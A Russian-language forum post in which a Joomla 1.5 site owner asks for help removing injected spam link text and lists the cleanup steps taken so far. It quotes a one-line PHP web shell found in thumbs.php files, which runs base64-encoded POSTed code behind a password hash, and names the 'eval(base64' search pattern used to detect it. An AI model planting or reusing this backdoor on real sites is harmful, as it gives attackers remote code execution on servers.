Друзья! Помогите избавиться от гадости, которая терроризирует меня уже неделю.
Симптомы: появление текста на сайте с ссылками на забугорском языке. Текст всегда появляется вверху материала (материал сдвигается вниз). Текст появляется
не во всех материалах (произвольно).
Есть временный способ убрать текст. Описан тут ниже.
Вот скриншот:
Что я успел сделать:
- убрал галки "сохранить пароль" во всех ftp клиентах: filezilla, total commander
- нашел пару файлов с названием thumbs.php со строкой (ниже). Файлы убил.
<?php if(md5($_POST["password"])=="f2bb400a3ca9dc8a5590379a67872892"){eval(base64_decode($_POST["code"]));} ?>
- взял, используемый тут, fls.php. Получил список (под спойлером). Список почистил от самого fls.php
Список внушительный...
- поудалял неиспользуемые расширения для Joomla
- скопировал сайт и проверил его антивирусами: Nod, Comodo Internet Security (все базы свежие). Ничего не нашлось
- провел поиск по тексту "eval(base64"
- добавил в каждую (!) папку файл index.html с текстом "<html><body bgcolor="#FFFFFF"></body></html>". Убил на это три часа.
- защитил админку с помощью plgSystemJSecure-1.0.7
- поменял пароли на довольно сложные к FTP и mysql. Также поменял пароль на админку.
- обратился к хостеру насчет прав на папки/файлы. Сам назначить не могу, поэтому жду ответа.
Расширения уже давно
не обновлял и
не устанавливал.
Joomla 1.5.12, переход на более свежий движок
исключен: было сделано много изменений вручную в файлах Joomla и вспомнить что и где - невозможно.
Интересный момент: когда захожу в материал, где есть проявление этого гада, и пересохраняю его без изменений:
зловредный текст пропадает на всех страницах. И проявляет себя по разному (в среднем раз в 6-24 часа). Надо бы еще проследить зависимость...
Имеется автоматически настроенная выгрузка из 1С (7.7) в базу сайта раз в день с другого компьютера. Сегодня сделаю наблюдение: на этом ли этапе происходит внедрение кода.
В последнее время, как я уже писал выше, ничего не устанавливалось. Делались лишь множественные правки вручную в шаблоне и в других файлах для повышения функциональности.
Был подключен чат от siteheart, но он был подключен достаточно давно, а вирус объявился недавно. Неужели он?
Где-то три месяца назад началась рассылка спама через уязвимость в стандартной форме "задать вопрос о товаре". Форма была убрана из шаблона. Стоить заметить - спам приходит, но реже. Скорее всего мой адрес уже у спамеров в базе.
Итак, требуется помощь от сообщества Joomla. Нужно удавить эту дрянь на корню и помочь другим с подобной проблемой.